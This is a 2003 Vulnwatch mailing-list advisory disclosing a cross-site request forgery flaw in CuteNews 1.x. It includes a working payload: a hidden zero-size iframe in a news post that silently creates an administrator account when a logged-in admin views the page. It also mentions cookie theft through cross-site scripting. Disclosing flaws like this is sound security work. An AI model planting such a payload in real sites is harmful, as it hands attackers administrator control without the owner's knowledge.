Vulnwatch mailing list archives
Admin Account Creation Vulnerability in CuteNews 1.x
From: "Peter Winter-Smith" <peter4020 () hotmail com>
Date: Sun, 29 Jun 2003 09:04:58 +0000
Admin Account Creation Vulnerability in CuteNews 1.x Url: http://www.cutephp.com CuteNews is an efficient, user-friendly and well designed news system which is both easy to set up, and doesn't even require SQL to function instead creating it's own databases. It supports multiple user levels, such as Journalist (3), Editor (2) and Admininistrator (1), and has taken precautions to ensure that field injection cannot alter the user level, by placing the user level at the start of the database, rather than after any given field. It does however allow the minor users to post HTML content in their posts, which could lead to cross site scripting cookie 'stealing', but luckily the creator has only stored MD5 hashes of the password, so that accounts cannot be directly stolen. It appears however that CuteNews does not filter urls relating to the site itself, or rather the CuteNews control panel. Therefore, if a user was to inject the correct commands into a news article in a hidden IFRAME, or some such control, then upon the administrator browing to the news page after having signed in to CuteNews the commands would be executed and the administrator would be none the wiser. Example: --------------------------------[Start Post]------------------------------- Blah, blah, welcome to site.com, etc.<iframe src="index.php?regusername=owned®password=pass®nickname=owned®email=none () none com®level=1&action=adduser&mod=editusers" height=0 width=0 frameborder=0 scrolling=0></iframe>
---------------------------------[End Post]-------------------------------- If the above data was posted on the news page, the administrator accounts would be able to execute the command without any notification at all. That URL in particular adds an administrator account with the username 'owned' and the password 'pass'. ================================================================ Operating system and servicepack level: Any operating system. Software: CuteNews, PHP 4+ Under what circumstances the vulnerability was discovered: Messing around with CuteNews If the vendor has been notified: Yes. How to contact you for further information: I can always be reached at peter4020 () hotmail com Please credit this find to: Peter Winter-Smith Thank you for your time, -Peter _________________________________________________________________Tired of 56k? Get a FREE BT Broadband connection http://www.msn.co.uk/specials/btbroadband
Current thread:
- Admin Account Creation Vulnerability in CuteNews 1.x Peter Winter-Smith (Jun 29)